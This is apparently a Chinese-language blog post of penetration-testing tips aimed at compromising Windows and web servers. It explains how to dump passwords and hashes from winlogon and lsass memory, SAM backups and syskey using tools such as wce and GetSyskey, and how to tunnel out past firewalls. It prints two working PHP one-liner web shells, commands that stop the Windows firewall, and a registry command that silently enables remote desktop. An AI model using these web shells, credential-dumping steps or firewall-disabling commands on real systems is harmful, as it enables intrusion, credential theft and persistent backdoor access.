渗透笔记(4)

、在win系统中，控制用户登陆的系统进程是“winlogon.exe”，系统在每一个用户登陆时都会产生一个“winlogon.exe”进程。通过查找这个进程访问的内存模块，可以获得保存在内存中的用户名和密码。

2、“Lsass.exe”是win下一个必不可少的进程，属于微软win系统中安全机制的相关进程，此进程主要用于本地安全和登陆策略，同时也管理域IP相关的安全信息。可用LSASecretsView这个软件破之。

3、上手的时候，先搜搜有没有备份好的SAM文件。例如管理员经常将重要的文件备份在c:windowsrepair或是c:windowsbackup下，如果找到，将省去大半的功夫。

4、有经验的管理员会使用C:WindowsSystem32syskey.exe这个小工具来对系统密码做双重加密，像bios密码一样加多一次防护。

5、跟SAM文件的防护机制一样，syskey.exe这个小工具也会生成一个类似的文件叫做system。也在c:windowssystem32config目录下。可用SAMInside软件附带的一个小工具GetSyskey.exe来抓取syskey。

6、对方开放42端口要特别留意，可能启用了WINS服务，进一步说明背后可能有着复杂的内网拓扑结构。

7、进行嗅探时，对网络结构布局的了解是必须的，否则嗅探很可能会失败。常见的VLAN类型有以下几种：（1）基于端口的VLAN.（2）基于MAC地址的VLAN.（3）基于路由的VLAN.（4）基于策略的VLAN.

8、HTRAN、LCX等端口转发出不来被墙的一个解决办法猜想，可以看看对方的防火墙是什么牌子滴，下一个回来本地看看它升级的时候流量是从哪个端口出去的。（不过大型企业的防火墙都是在内网的，服务器省级的….）

9、HTRAN、LCX转发失败，还可以尝试的办法是80端口复用，也就是HTTP隧道，这方面的工具有reDuh和tunnal（使用说明请戳这里）

10、使用wce_1.4.exe可以非常有效地抓取windows的哈希，如果不成功，可以尝试以下两点：（1）提升到system再次尝试；（2）在非系统终端尝试一下（webshell）

11、如果再不出来，在尝试下PingTunnel（Ptunnel）和DnsTunnel（DNS2tcp），如果不行，那就只好360你好，360再见了…….<(￣）￣)>

12、linux主机传二进制文件的几个方法:scp/sftp/ftp/tftp/wget

13、简便执行命令的PHP一句话（当然，很多网站都会把system函数给禁了）：
<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>    #用法xxx.php?cmd=whoami
复制代码

14、一句话上传不上去？不妨试试这个：
<?php $_GET[a]($_GET[b]);?>          #利用方法：xxx.php?a=assert&b=${phpinfo()};
复制代码
15、在windows执行命令时，遇到空格用“”括起来就可以执行，例子如下：
net stop windows" "firewall
net stop Windows" "Firewall/Internet" "Connection" "Sharing" "(ICS)
复制代码

16、干掉IPSEC后仍然无法连接3389，就可以用到antifw工具，自动停止IIS将3389转到80上，本工具介绍请参见91ri文章

17、命令行下查看3389远程桌面信息：
（1）查看远程桌面有没有开启：
net start | find "Remote Desktop Services"       #win7、win2008
net start | find "Terminal Services "       #win xp、win2003
复制代码
或是
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections
复制代码
如是0×0，则可以连接，考虑是否有tcp过滤或者防火墙了；如果没有打开为0×1。
（2）查看远程桌面连接所开的端口是多少：
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
复制代码

一般默认显示是0xd3d ， 也就是3389。

18、命令行下开启3389：
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
复制代码
win7亲测可用。


19、一些网站的网页没有扩展名，或者只出现.html的静态网页的拓展名。判断此类网站用的什么技术，需要从几方面分析：
方法（1）：
查看该网站的开发开放平台。
a.比如：GOOGLE有个GoogleCode，里面提供GOOGLE各种Search Engine API，还有GoogleAJAX。那么GOOGLE提供的API全是JAVA的（全无PHP，ASP等），由此可以判断GOOGLE必定就是JSP。
c.再比如：去维基百科，当你点到某些提交信息的按钮时候，IE的状态栏（下方）会马上呈现…php的拓展名。正常在地址栏上看不到.php的原因是，Wikipedia会把你提交信息后，转到另一个.html页面，而不会直接显示那个.php页面。
方法（2）：
学习JSP，PHP等相关技术，就能了解用这些技术开发的网站的特点，根据结构就可以判断。
a.比如：校内网，他们在招聘开发者只要求会JSP，Struts（JSPMVC的结构之一）。而且校内大部分开放平台开发的游戏都是JSP写的，由此断定，校内就是用JSP的(其实校内拓展名.do是典型的JSPStruts)。
b.比如：百度，从它贴吧，知道上提交模式，以及百度大部分拓展名都被隐藏（PHP网站经常用apache里的功能来隐藏拓展名）来看，百度就是用PHP的。
方法（3）：
在该网站的招聘要求中，看看应聘网站后台程序员，需要会什么语言。校内网的招聘网页，就是个好例（yin）子（dang）。

要同时满足大牛和小菜的阅读需求真的很难办，市场定位是个难题啊，再加上小编的水平也不高，各位请见谅勿喷，有更好的渗透经验请不吝跟帖哦╮(￣▽￣)╭